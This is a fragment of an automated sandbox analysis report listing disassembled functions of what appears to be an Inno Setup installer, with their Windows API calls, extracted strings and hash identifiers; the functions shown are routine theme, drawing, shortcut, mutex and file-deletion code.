                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                              • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                              • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                              • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                              Function 00478AC0 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: NtdllProc_Window
                                                              • String ID:
                                                              • API String ID: 4255912815-0
                                                              • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                              • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                              • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                              • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                              Function 0045D23C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CryptFour
                                                              • String ID:
                                                              • API String ID: 2153018856-0
                                                              • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                              • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                              • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                              • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                              Function 0045D254 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CryptFour
                                                              • String ID:
                                                              • API String ID: 2153018856-0
                                                              • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                              • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                              • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                              • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                              Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3335312705.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.3335298923.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 00000001.00000002.3335333324.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                              • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                              • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                              • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                              Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3335312705.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.3335298923.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 00000001.00000002.3335333324.0000000010002000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                              • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                              • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                              • Instruction Fuzzy Hash:
                                                              Function 0044B658 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                              • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                              • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                              • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                              • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                              • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                              • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                              • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                              • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                              • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                              • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                              • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                              • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                              • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                              • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                              • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                              • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                              • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                              • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoadVersion
                                                              • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                              • API String ID: 1968650500-2910565190
                                                              • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                              • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                              • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                              • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                              Function 0041CA0C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0041CA40
                                                              • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                              • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                              • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                              • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                              • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                              • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                              • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                              • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                              • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                              • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                              • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                              • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                              • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                              • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                              • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                              • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                              • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                              • String ID:
                                                              • API String ID: 269503290-0
                                                              • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                              • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                              • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                              • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                              Function 00456638 Relevance: 26.6, APIs: 4, Strings: 11, Instructions: 310comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                              • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                              • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                              Strings
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                              • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                              • IPropertyStore::Commit, xrefs: 004568E3
                                                              • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                              • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                              • IPersistFile::Save, xrefs: 00456962
                                                              • CoCreateInstance, xrefs: 004566AF
                                                              • {pf32}\, xrefs: 0045671E
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                              • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance$FreeString
                                                              • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                              • API String ID: 308859552-2363233914
                                                              • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                              • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                              • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                              • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                              Function 004983D0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                              • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                              • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                              • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                              • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                              • API String ID: 2000705611-3672972446
                                                              • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                              • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                              • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                              • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                              Function 0045A6D8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                              • API String ID: 1452528299-3112430753
                                                              • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                              • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                              • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                              • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                              Function 0045CBC0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersion.KERNEL32 ref: 0045CBDA
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                              • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                              • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                              • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                              • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                              • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                              • API String ID: 59345061-4263478283
                                                              • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                              • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                              • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                              • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                              Function 0041B3AC Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                              • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                              • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                              • GetDC.USER32(00000000), ref: 0041B402
                                                              • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                              • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                              • DeleteDC.GDI32(00000000), ref: 0041B4D0
